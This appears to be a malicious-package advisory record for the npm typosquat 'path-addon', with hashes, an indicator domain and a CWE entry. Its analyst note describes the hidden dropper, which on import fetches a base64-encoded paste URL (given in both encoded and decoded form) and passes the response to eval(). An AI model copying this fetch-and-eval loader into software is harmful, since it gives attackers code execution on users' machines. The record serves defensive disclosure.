-= Per source details. Do not edit below this line.=-
path-addon impersonates the Node.js core path module (package name path-addon, README claims to be 'an exact copy of the NodeJS path module'). The body of path.js is the genuine Joyent path implementation, but a remote-code-execution dropper has been inserted: on require(), the module calls fetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9SRlc2SQ==")) — which decodes to https://www.jsonkeeper.com/b/RFW6I, an anonymous mutable JSON paste host — then reads the response's content field and passes it to eval(). The destination URL is base64-encoded specifically to evade casual review and string-based scanners. Any process that imports path-addon executes whatever JavaScript the attacker has placed at that paste URL at the moment of require(), with no integrity check, no pinning, and no version constraint. The combined shape (typosquat name + trojanized legitimate source + obfuscated fetch + eval of remote content at module load) is unambiguous attacker tooling.
The OpenSSF Package Analysis project identified 'path-addon' @ 1.0.4 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
{
"malicious-packages-origins": [
{
"import_time": "2026-05-04T03:13:19.749729318Z",
"versions": [
"1.0.4"
],
"sha256": "4aac3da4c776f814c79af215bfde0f1ee2c3db50e9b18997447f28e9d04df88a",
"source": "ossf-package-analysis",
"modified_time": "2026-05-01T07:11:33Z"
},
{
"modified_time": "2026-05-12T06:53:21Z",
"versions": [
"1.0.4"
],
"sha256": "1f1ee3f4c05bbe24c4113835e304dd3ee650c0a9eee8a4d62046283612827742",
"source": "amazon-inspector",
"import_time": "2026-05-12T07:28:51.773167504Z"
},
{
"import_time": "2026-05-26T00:54:40.033890594Z",
"versions": [
"1.0.6"
],
"sha256": "841010d222011fd6020bd7fc04307bbf20506c3fa1837fb14c4ec50996458a76",
"source": "ossf-package-analysis",
"modified_time": "2026-05-25T17:27:33Z"
},
{
"modified_time": "2026-05-25T15:35:01Z",
"versions": [
"1.0.5"
],
"sha256": "dd3198bde6aa2ea1b04043cb0a16d831667118334a13c759c7097261933457a1",
"id": "IN-MAL-2026-004708",
"source": "amazon-inspector",
"import_time": "2026-05-26T05:53:07.668659711Z"
},
{
"modified_time": "2026-05-25T15:34:51Z",
"versions": [
"1.0.5"
],
"sha256": "0e17241453cc8d0c8c3ce06b18aa75eaca0799c9af55e08d406e2c5fed41a695",
"id": "IN-MAL-2026-004707",
"source": "amazon-inspector",
"import_time": "2026-05-26T05:53:07.508831951Z"
},
{
"import_time": "2026-05-26T05:53:09.369780288Z",
"versions": [
"1.0.6"
],
"sha256": "11d09848fb828ae851ef7b905f793e3b5876ee2a5ef4b4f8bf06d631ea904d78",
"id": "IN-MAL-2026-004721",
"source": "amazon-inspector",
"modified_time": "2026-05-25T16:22:50Z"
},
{
"modified_time": "2026-05-25T16:22:55Z",
"versions": [
"1.0.6"
],
"sha256": "4d7ce32d8902775c2d8d86acb27650f28f454f623487504019f5ee4388f0c8ac",
"id": "IN-MAL-2026-004722",
"source": "amazon-inspector",
"import_time": "2026-05-26T05:53:09.513367294Z"
},
{
"modified_time": "2026-06-08T20:28:30Z",
"versions": [
"1.0.7"
],
"sha256": "44f7119799063ff81af4ca2879278aa26f2e56e23a601ef632a65f97d67a0451",
"id": "IN-MAL-2026-004935",
"source": "amazon-inspector",
"import_time": "2026-06-08T21:15:22.230568399Z"
},
{
"modified_time": "2026-06-08T20:28:29Z",
"versions": [
"1.0.7"
],
"sha256": "ba1a7df799b6bd11bd036f1cfb1de6b1dfe0e4e72082be1b8a60537a59e5ae58",
"id": "IN-MAL-2026-004934",
"source": "amazon-inspector",
"import_time": "2026-06-08T21:15:22.165466482Z"
}
]
}
{
"domains": [
"www.jsonkeeper.com"
],
"evidence_files": [
{
"sha256": "266311c35a81980e7c59d5d12dcbcc6aaf8b0a4fc5ab082a57586efd13e68baa",
"tlsh": "897296045945654a9a3677b0df0a340ef77688f35315ab00f89ce6502f72e78a2feed8",
"path": "path.js"
},
{
"sha256": "c4c84bbc00493a9ac804f2dabcfd2767e9408ab280a87c12d14c887bfd81bf81",
"tlsh": "2dd0978c0383312761ac4703faa680e28d02e4cd4723100078ce5bf0a2b1da1402610e",
"path": "README.md"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-61gD0Y6RUnuB0mAVP3Xw6IjjjxTjUpWRbK89PzAhVRG60TfTRv8CNc9XLjBEJs+KpE0PWYsbbd+DyzvnQSoHYw==",
"sha1": "e31fdedd8ffeee18b4dfa68129407959c824c723"
},
"filename": "path-addon-1.0.5.tgz"
}
]
}
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/path-addon/MAL-2026-3311.json"